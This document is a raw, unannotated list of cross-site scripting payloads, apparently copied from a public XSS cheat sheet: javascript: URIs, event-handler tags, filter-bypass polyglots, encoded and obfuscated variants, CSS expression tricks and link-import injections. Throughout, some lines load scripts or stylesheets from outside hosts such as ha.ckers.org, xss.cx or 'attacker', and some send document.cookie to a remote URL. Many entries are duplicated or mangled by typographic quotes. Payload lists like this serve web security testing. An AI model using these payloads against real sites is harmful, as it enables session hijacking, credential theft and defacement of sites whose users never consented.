- jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
- javascript:alert(1)
- javascript	:alert(1)
- javascript://%0Aalert(1)
- javascript://%0aalert(1) or javascript://%250aalert(1)
- javascript:1/*click me!*/ + <alert(1)<! — K </alert(1)<! — →
- javascript:1/*click me!*/ + <alert(1)<!V onclick=location=innerHTML%2bouterHTML>
- javascript://%250Aalert(document.cookie)
- javascript://%250Aalert(document.location=”https://google.com",document.location="https://www.facebook.com")
- javascript:’\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
- “javascript:alert(0)”></param></object>
- ?javascript:alert(1)”,
- javas + cript: + -alert(1)
- javas + cript: + ale + rt + ( + 1 + )
- javas + cript: + ale + rt + (1)
- javas + cript:” + “-alert(1)
- javascrip + t:alert(1)
- javascript: + -alert(1)
- javascript:” + “-alert(1)
- javascript:alert(1);
- javascript:alert(1)//
- javascript:alert(1)
- JaVaScRipT: alert (1)
- JaVaScRipT:alert(1)
- JavaSCript:alert(123)
- javascript:alert(1)//INJECTX
- <javascript:alert(1) onclick=location=tagName>click me! <== doesn’t work! So…
- javascript:alert%281%29;
- javascript:alert%281%29
- javascript:alert(document.domain);
- javascript:alert(“hellox worldss”)
- javascript:alert(1)
- javascript:alert(document.cookie) // AsharJaved
- javascript:alert()// →</script></textarea></style></title><a”//’ onclick=alert()//>*/alert()/*
- javascript:alert()//<svg/onload=alert()>’-alert(“-alert()-”)-’
- javascript://anything%0D%0A%0D%0Awindow.alert(1)
- javas + cript:’click me! + #’-alert(1)
- javas + cript:”click me! + #”-alert(1)
- javas + cript:click me! + #-alert(1)
- javascrip + t:’click me! + #’-alert(1)
- javascrip + t:”click me! + #”-alert(1)
- javascrip + t:click me! + #-alert(1)
- javascript + :’click me! + #’-alert(1)
- javascript + :”click me! + #”-alert(1)
- javascript + :click me! + #-alert(1)
- javascript: + /*click me! + #*/alert(1)
- javascript: +click me! + #-alert(1)
- javascript + :”-’click me! + http://..."-'click me</javascript>#’-alert(1)
- javas + cript:-click me! + http://domain/page?p=%3Cjavas%20onclick=location=tagName%2binnerHTML%2bURL%3Ecript:-click me!</javas>#-alert(1)
- javas + cript:”-’click me! + http://domain/page?p=<javas%20onclick=location=tagName%2binnerHTML%2bURL>cript:"-'click me!</javas>#’-alert(1)
- javascript:-click me! + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:-click me!</j>#-alert(1)
- javascript:”-’click me! + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:”-’click me!</j>#’-alert(1)
- javascript:/*click me! + <j 1=”*/””-alert(1)<! — K
- javascript:/*click me! + */” + <j 1=”-alert(9)//” …
- javascript:/*click me! + */” + <j”-alert(9)<! — …
- javascript:/*click me! + */ + <x 1= -alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
- javascript:/*click me! + */” + <x 1=” -alert(9)//” onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
- javascript:/*click me! + */ + <x-alert(9)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
- javascript:/*click me! + */” + <x”-alert(9)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
- javascript:alert(1)
- javaSCRIPT & colon; alert (1)
- javaSCRIPT:alert(1)
- javaSCRIPT:confirm(1)
- ;})javascript:confirm(0);
- ;javascript:confirm(0);
- “javascript:confirm(0);”,
- javascript:confirm(0);
- javascript:confirm(1)//
- JaVaScRipT:confirm(1)
- JaVAscRIPT:confirm(4)
- javascript:confirm(7)//://svg
- javascript:confirm&lpar�A1&rpar�A
- javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
- javascript:document.cookie=window.prompt(“edit cookie:”,document.cookie);void(0);
- javascript:document.scripts[0].src=’http://127.0.0.1/yy.js';void(0);
- javascript:document.write(“<script src=xxx></script>”)
- javascript:document.write(unescape(‘<script src=”http://www.xxxx.com/x.js"></script>'));
- javascript:%E2%80%A8alert`1`
- javascript:eval(unescape(location.href))
- javascript:HTMLDocument.__proto__.__defineSetter__(“prototype”,function(){try{d.d.d}catch(e){confirm(e.stack)}})
- javascript: + http://domain/page?p=<javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
- javascript:- + http://domain/page?p=<javascript:- onclick=location=tagName%2bURL>click me!#-alert(1)
- javascript:”-’ + http://domain/page?p=<javascript:"-' onclick=location=tagName%2bURL>click me!#’-alert(1)
- javas + cript: + http://domain/page?p=<javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
- javascript: + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
- javascripT://https://google.com%0aalert(1);//https://google.com
- <javascript id=:alert(195) onmouseover=location=tagName%2Bid>00000
- <javascript id=:alert%26%2340;39%26%2341 onmouseover=location=tagName%2Bid>00000
- <javascript id=:alert(38) onmouseover=location=tagName%2Bid>00000
- <javascript id=:alert(193) onmouseover=location=tagName+id>00000
- <javascript id=:alert(194) onmouseover=location=tagName+id>00000
- javascript:/* + <j 1=”*/””-alert(1)<!V onclick=location=innerHTML%2bouterHTML>
- javascript:/* + <j 1=*/-alert(1)<!V onclick=location=innerHTML%2bouterHTML>
- javascript = jAvascript
- Javascript = jAvascript
- jaVasCript:/*-/*`/*`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>
- jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
- <! — jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e →
- jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
- jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
- <javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
- <javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>’click me!</javascript:>#’-alert(1)
- <javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>click me!</javascript:>#-alert(1)
- <javascript onclick=alert(tagName%2Blocation.hash)>click me!#:alert(1)
- <javascript: onclick=alert(tagName%2Blocation.hash)>click me!#alert(1)
- <javascript onclick=alert(tagName)>click me!
- jaVasCript:, oNcliCk=, et al.
- <javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
- <javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>’click me!#’-alert(1)
- <javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>click me!#-alert(1)
- <javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:/*click me!#*/alert(9)
- <javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:’click me!#’-alert(9)
- <javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:click me!#-alert(9)
- <javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
- <javascript:- onclick=location=tagName%2bURL>click me!#-alert(1)
- <javascript:”-’ onclick=location=tagName%2bURL>click me!#’-alert(1)
- <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me!
- <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me!#*/alert(1)
- <javascript onclick=location=tagName+innerHTML+location.hash>:’click me!#’-alert(1)
- <javascript onclick=location=tagName+innerHTML+URL>:”-’click me!</javascript>#’-alert(1)
- <javascript onclick=location=tagName+location.hash(1)>click me!#:alert(1)
- <javascript: onclick=location=tagName+URL>click me!#%0Aalert(1)
- <javascript:”-’ onclick=location=tagName+URL>click me!#’-alert(1)
- javascript:prompt(1)#{“action”:1}
- “javascript:prompt(/compaXSS/.source);var x = prompt;x(0);x(/XSS/.source);x”
- /”/_javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x
- javascript:prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x
- javascript:propmpt(1)
- javascript:// →</script></title></style>”/</textarea>*/<alert()/*’ onclick=alert()//>a
- javascript:/* →]]>%>?></script></title></textarea></noscript></style></xmp>”>[img=1,name=/alert(1)/.source]<img — /style=a:expression(/*'/- /*',/**/eval(name)/*%2A///*///);width:100%;height:100%;position:absolute;-ms- behavior:url(#default#time2) name=alert(1)onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>”
- ‘/(javascript\s*:)/Usi’,
- javascript<TAB>:alert(1)
- javascript://’//” →</textarea></style></script></title><b onclick= alert()//>*/alert()/*
- javascript://</title>”/</script></style></textarea/ →*/<alert()/*’ onclick=alert()//>/
- javascript://</title></style></textarea> →</script><a”//’ onclick=alert()//>*/alert()/*
- javascript://’/</title></style></textarea></script> →<p” onclick=alert()//>*/alert()/*
- javascript:// →</title></style></textarea></script><svg “//’ onclick=alert()//
- javascript:/* →</title></style></textarea></script></xmp><svg/onload=’+//+/onmouseover=1/+/[*/[]/+alert(1)//’>
- javascript:/* →</title></style></textarea></script></xmp><svg/onload=’+/”/+/onmouseover=1/+/[*/[]/+alert(1)//’>
- javascript://</title></textarea></style></script →<li ‘//” ‘*/alert()/*’, onclick=alert()//
- javascript:\u0061lert(1)
- javascript: \ u0061lert & # x28; 1 ??& # x29
- javascript:\u0061lert(1)
- (javascript:window.onerror=confirm;throw%20document.cookie)
- javascript:alert(document.cookie)
- javascript:confirm(document.cookie)
- <javas onclick=location=tagName%2binnerHTML%2bURL>cript:-click me!</javas>#-alert(1)
- <javas onclick=location=tagName%2binnerHTML%2bURL>cript:”-’click me!</javas>#’-alert(1)
- <javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
- <javas onclick=location=tagName+innerHTML+URL>cript:”-’click me!</javas>#’-alert(1)
- <javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)
- javas + script: + ale + rt + (1)
- javas & Tab; cript: \ u0061lert (1);
- javas	cript:\u0061lert(1);
- javascript:name
- j
a
vas
cript:confirm(1);
- <j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>
- <j onclick=location=innerHTML%2bURL>javascript:-click me!</j>#-alert(1)
- <j onclick=location=innerHTML%2bURL>javascript:”-’click me!</j>#’-alert(1)
- <j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
- <j onclick=location=innerHTML>javascript%26colon;alert(1)//
- <j onclick=location=innerHTML>javascript:alert(1)//
- <j onclick=location=innerHTML+URL>javascript:”-’click me!</j>#’-alert(1)
- <j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)
- <j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>
- $(‘ jqueryselector’).append(‘some text to append’);
- JSON.parse(‘{“__proto__”:[“a”,1]}’)
- JSP a = val1
- <keygen autofocus onfocus=alert(1)>
- <keygen autofocus onfocus=alert(104)>
- <keygen autofocus onfocus=alert(1)>//INJECTX
- <keygen id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>”>/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
- “>/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
- “>/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
- <kukux onanimationend=alert(34)>
- <kukux style=animation-name:n onanimationend=alert(43)>
- <kukux style=display:block;position:absolute;background-color:red;font-size:999px onmouseenter=alert(document.domain)></kukux>
- l= 0 || ‘str’,m= 0 || ‘sub’,x= 0 || ‘al’,y= 0 || ‘ev’,g= 0 || ‘tion.h’,f= 0 || ‘ash’,k= 0 || ‘loca’,d= (k) + (g) + (f),a
- <label class=”<% confirm(1) %>”>
- language=vbs>test</b>
- <LAYER id=XSS SRC=”http://xxxx.com/scriptlet.html"></LAYER>
- <LAYER SRC=”http://ha.ckers.org/
- <;LAYER SRC=”;http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
- <LAYER SRC=”http://ha.ckers.org/scriptlet.html"></LAYER>
- <Layer+src=”http://localhost">
- <LAYER src=”http://xss.ha.ckers.org/a.js"></layer>
- <LAYER SRC=”http://xss.ha.ckers.org/a.js"></layer>
- <LAYER SRC=”javascript:document.vulnerable=true;”></LAYER>
- <LAYER SRC=”%(scriptlet)s”></LAYER>
- {}let{}={}
- let=[`const`];
- let=[`const`];(_=_=>let+`ructor`)[_`${_=`ale`}`](_+`rt(let)`)``
- let:let{let:[x=1]}=[alert(1)]
- (_=_=>let+`ructor`)
- <limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
- <limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
- <limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
- <limited_xss_point>eval(get(‘http://xxx.com/x'));</limited_xss_point>
- <limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
- <limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
- <limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
- <limited_xss_point>loads(‘http://xxx.com/x');</limited_xss_point>
- <link%20rel=”import”%20href=”?bypass=<script>confirm(document.domain)</script>”>
- <link%20rel=import%20href=http://avlidienbrunn.se/test.php>
- <link%20rel=import%20href=https:html5sec.org/test.swf
- <link href=”http://host/xss.css">
- <link href=”javascript:alert(1)” rel=”next”>
- <link+id=p1+rel=import+href=/dom/sinks.html>&name=<img/src/onerror=alert(1)>
- <link rel=”import”
- <link rel=import href=angular.html><p ng-app>{{constructor.constructor(‘alert(1)’)()}}
- <link rel=import href=angular.html><p ng-app>{{constructor.constructor(‘alert(18)’)()}}
- <link rel=import href=/bypass/babel-standalone.html><svg><script type=text/jsx>//<! —
- <link rel=import href=/bypass/babel-standalone.html><svg><script type=text/jsx>//<! — alert(21)// →</svg><script>0</script>
- <link rel=import href=/bypass/jquery.html><p class=container></p><form class=child><input name=ownerDocument><script><! — alert(19)</script></form>
- <link rel=import href=/bypass/jquery.html><p class=container></p><form class=child><input name=ownerDocument><script><! — alert(1)</script></form>
- <link rel=import href=”/bypass/path/<script>alert(16)</script>”>
- <link rel=import href=/bypass/underscore.html><script id=template>//<%alert`1`%></script>
- <link rel=import href=/bypass/underscore.html><script id=template>//<%alert`20`%></script>
- <link rel=import href=/bypass/usercontent/icon.jpg>
- <link rel=import href=/bypass/vue.html><div id=app>{{constructor.constructor(‘alert(1)’)()}}
- <link rel=import href=”data:,%%0D3Cscript>alert(68)%%0D3C%%0D2Fscript>
- <link rel=import href=data:text/html;base64,PHNjcmlwdD5wb3B1cD0xOzwvc2NyaXB0Pg==>
- <link rel=import href=”data:text/html,<script>alert(1)</script>
- <link rel=import href=”data:text/html,<script>alert(1)</script>
- “><link rel=import href=data:text/html,<script>alert(1)</script>
- <link rel=”import” href=”data:text/html,<script>alert(document.domain)< ;/script>
- <link rel=import href=”data:text/html,<script>alert(1)</script>
- “><link rel=import href=data:text/html,<script>alert(1)</script>
- <link rel=”import” href=”data:x,<script>alert(1)</script>
- <link rel=import href=//evil>
- <link rel=import href=/%http://0d-z.exeye.io >
- <link rel=import href=/upload/…..>
- <link rel=”import” href=”//xss.cx”>
- <link rel=import onerror=confirm(1)>
- <link/rel=prefetch
import
- <link/rel=prefetch
import href=data:q;base64,PHNjcmlwdD5hbGVydCgnQHFhYicpPC9zY3JpcHQ+>
- <link/rel=prefetch
import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4g>
- <link rel=”prefetch” href=”http://xss.cx">
- <link/rel=prefetchimport href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
- <link rel=’preload’ href=’#’ as=’script’ onload=’confirm(203)’>
- <link rel=’preload’ href=’#’ as=’script’ onload=’confirm(domain)’>
- <link rel=stylesheet href=//attacker/test.css>
- <link rel=stylesheet href=’data:,?*%7bx:expression(alert(1))%7D’ >
- <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
- <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d>
- <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
- <link rel=stylesheet href=’data:,+/v8*%7bx:e+AHgAcA-ression(confirm(1))%7D’ >
- <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css">
- “><link rel=”stylesheet” href=”http://8ant.org/asdfqwer.css"><"
- <;LINK REL=”;stylesheet”; HREF=”;http://ha.ckers.org/xss.css";>;
- <LINK REL=”stylesheet” HREF=”http://ha.ckers.org/xss.css">
- <link rel = “stylesheet” href =”http://www.xxx.com/atack.css">
- <LINK REL=”stylesheet” HREF=”http://xss.cx/xss.css">
- <LINK REL=”stylesheet” HREF=”http://xxxx.com/xss.css">
- <LINK REL=”stylesheet” href=”javascript:alert(‘XlSS’);”>
- <;LINK REL=”;stylesheet”; HREF=”;javascript:alert(‘;XSS’;);”;>;
- <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- <LINK REL=”stylesheet” HREF=”javascript:alert(XSS);”>
- <LINK REL=”stylesheet” HREF=”javascript:confirm(document.location);”>
- <link rel=”stylesheet” href=”javascript:document.vulnerable=true;”>
- <link REL=”stylesheet” HREF=”javascript:document.vulnerable=true;”>
- <LINK REL=”stylesheet” HREF=”javascript:javascript:alert(1);”>
- <listener event=”load” handler=”#y” xmlns=”http://www.w3.org/2001/xml-events" observer=”x”/>
- <listing><img src=1 onerror=alert(1) ></listing>
- <listing><img src=x onerror=confirm(1)></listing>
- <li style=”color:rgb(‘’0,0,�javascript:expression(confirm(1))”>XSS</li>
- <li style=list-style:url() onerror=alert(1)>
- <li style=list-style:url() onerror=alert(1)></li>
- <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
- <LoadingMovMinDuration>3</LoadingMovMinDuration>
- <LoadingMovPercentToLoad>50</LoadingMovPercentToLoad>
- <LoadingMovURL>http://thebest404pageever.com/swf/FUUUUUUUUUUUUUUUUUUUUUUUUUCK.swf</LoadingMovURL>
- <! — localhost/xss.php?q=PAYLOAD →
- location+=[]
- location=’vbscript:alert(1)'
- =location=a?jav\x41script\x3aconfirm\x28a3ZDresearcha?\x29a2>ZDresearch
- location.assign`javascript:alert(1)`
- Location Based Payloads V Part I
- Location.hash[1] = :
- Location.hash[2]= (
- Location.hash[3] = )
- (location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}//<img src=”x:x” onerror=”if(location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}”>
- ;location.href=’http://site’;//
- “;location.href='http://site';//
- location.href`javascript:alert(1)`
- location=`http://google.com/csi ?${escape(document.cookie)}`;
- location=/http/.source+/:/.source[0]+/\//.source[1]+/\//.source[1]+/google.com/.source
- location=’http://\u{e01cc}\u{e01cd}\u{e01ce}\u{e01cf}\u{e01d0}\u{e01d1}\u{e01d2}\u{e01d3}\u{e01d4}\u{e01d5}google\u{e01da}\u{e01db}\u{e01dc}\u{e01dd}\u{e01de}\u{e01df}.com'
- location=’javascript:alert(~1)'
- ‘;location=’javascript://’%2Blocation.hash;’
- location=’javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c %75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)’
- location=’javascript:%61%6c%65%72%74%28%31%29'
- location=’javascript:alert(0)’;
- location`javascript:alert(1)`
- location=’javascript:ale’+’rt(12)’;
- location=javascript:confirm(0);.
- location=’javascript://\u2028alert(1)’;
- location=location.hash
- “;location=location.hash)//#0={};alert(0)
- location=location.hash //FF only
- location=location.hash.slice(1);
- location=location.hash.slice(1); //avoid the #
- “;location=name;//
- location=name;
- location=name
- location=name//’,’javascript:alert(1)’);
- location.reload`javascript:alert(1)`
- location.replace`javascript:alert(1)`
- location.search, tagName, nodeName, outerHTML
- location=unescape`%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%63%6F%6D`
- Lol:Function`alert(1)```````````
- LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
- lol video<!V”href=javascript:alert(1) style=font-size:50px;
- lol video<!Vhref=javascript:alert(1) style=font-size:50px;display:block;color:transparent;
- ( = (
- <
- <
- <
- <
- <![endif] — >
- <! — [if gte IE 4]>
- <A HREF=\”//google\”>XSS</A>
- <A HREF=\”http://0102.0146.0007.00000223/\”>XSS</A>
- <A HREF=\”http://0x42.0x0000066.0x7.0x93/\”>XSS</A>
- <A HREF=\”http://1113982867/\”>XSS</A>
- <A HREF=\”htt p://6 6.000146.0x7.147/\”>XSS</A>
- <A HREF=\”htt p://6 6.000146.0x7.147/\”>XSS</A>
- <A HREF=\”http://66.102.7.147/\”>XSS</A>
- <A HREF=\”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\”>XSS</A>
- <A HREF=\”http://google.com/\”>XSS</A>
- <A HREF=\”http://google:ha.ckers.org\”>XSS</A>
- <A HREF=\”http://ha.ckers.org@google\”>XSS</A>
- <A HREF=\”http://www.gohttp://www.google.com/ogle.com/\”>XSS</A>
- <A HREF=\”http://www.google.com./\”>XSS</A>
- <a href="http://i.imgur.com/b7sajuK.jpg" download><a href=”http://i.imgur.com/b7sajuK.jpg" download>What a cute kitty!</a></a>
- <A HREF=\”javascript:document.location=’http://www.google.com/’\”>XSS</A>
- <A HREF="//google">XSS</A>
- <A HREF="http://0102.0146.0007.00000223/">XSS</A>
- <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
- <A HREF="http://1113982867/">XSS</A>
- <A HREF="http://66.102.7.147/">XSS</A>
- <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
- <A HREF="http://google.com/">XSS</A>
- <A HREF="http://google:ha.ckers.org">XSS</A>
- <A HREF="http://ha.ckers.org@google">XSS</A>
- <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
- <A HREF="http://www.google.com./">XSS</A>
- <A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A>
- <A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
- <A HREF="//www.google.com/">XSS</A>
- <A HREF=\”//www.google.com/\”>XSS</A>
- <BASE HREF=\”javascript:alert(‘XSS’);//\”>
- <BASE HREF="javascript:alert('XSS');//">
- <BGSOUND SRC=\”javascript:alert(‘XSS’);\”>
- <BGSOUND SRC="javascript:alert('XSS');">
- <BODY BACKGROUND=\”javascript:alert(‘XSS’)\”>
- <BODY BACKGROUND="javascript:alert('XSS');">
- </BODY></HTML>
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\”XSS\”)>
- <BODY ONLOAD=alert('XSS')>
- <BODY ONLOAD=alert(‘XSS’)>
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- <BR SIZE=\”&{alert(‘XSS’)}\”>
- <br size=\"&{alert('XSS')}\">
- <BR SIZE="&{alert('XSS')}">
- </br style=a:expression(alert())>
- </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <DIV STYLE=\”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\”>
- <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”>
- <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
- <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="width: expression(alert('XSS'));">
- <DIV STYLE=\”width: expression(alert(‘XSS’));\”>
- <? echo('<SCR)';
- <? echo(‘<SCR)’;
- <EMBED SRC=\”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”></EMBED>
- <EMBED SRC=\”http://ha.ckers.org/xss.swf\” AllowScriptAccess=\”always\”></EMBED>
- <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
- <! — #exec cmd=\”/bin/echo ‘<SCR’\” — ><! — #exec cmd=\”/bin/echo ‘IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>’\” — >
- <! — #exec cmd="/bin/echo '<SCRIPT SRC'" — ><! — #exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
- <FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET>
- <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
- <HEAD><META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
- <HTML><BODY>
- <HTML xmlns:xss><?import namespace=\”xss\” implementation=\”http://ha.ckers.org/xss.htc\”><xss:xss>XSS</xss:xss></HTML>
- <HTML xmlns:xss>
- <! — [if gte IE 4]>
- <iframe src=http://ha.ckers.org/scriptlet.html>
- <IFRAME SRC=http://ha.ckers.org/scriptlet.html <
- <IFRAME SRC=\”javascript:alert(‘XSS’);\”></IFRAME>
- <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
- <IMG DYNSRC=\”javascript:alert(‘XSS’)\”>
- <IMG DYNSRC="javascript:alert('XSS');">
- <IMG \”\”\”><SCRIPT>alert(\”XSS\”)</SCRIPT>\”>
- <IMG LOWSRC=\”javascript:alert(‘XSS’)\”>
- <IMG LOWSRC="javascript:alert('XSS');">
- <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
- <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
- <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
- <IMG SRC='vbscript:msgbox("XSS")'>
- <IMG SRC=\”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\”>
- <IMG SRC=javascript:alert("XSS")>
- <IMG SRC=`javascript:alert(\”RSnake says, ‘XSS’\”)`>
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC=\”javascript:alert(‘XSS’)\”
- <IMG SRC=\” javascript:alert(‘XSS’);\”>
- <IMG SRC=\”javascript:alert(‘XSS’);\”>
- <IMG SRC=javascript:alert(‘XSS’)>
- <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- <IMG SRC=javascript:alert(&quot;XSS&quot;)>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=JaVaScRiPt:alert('XSS')>
- <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC=\”jav	ascript:alert(‘XSS’);\”>
- <IMG SRC=\”jav
ascript:alert(‘XSS’);\”>
- <IMG SRC=\”jav
ascript:alert(‘XSS’);\”>
- <IMG SRC=\”livescript:[code]\”>
- <IMG SRC=\”mocha:[code]\”>
- <IMG SRC=" &#14; javascript:alert('XSS');">
- <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
- <IMG SRC="jav&#x09;ascript:alert('XSS');">
- <IMG SRC="jav&#x0A;ascript:alert('XSS');">
- <IMG SRC="jav&#x0D;ascript:alert('XSS');">
- <IMG SRC="javascript:alert('XSS')"
- <IMG SRC="javascript:alert('XSS');">
- <IMG SRC="jav	ascript:alert('XSS');">
- <IMG SRC="livescript:[code]">
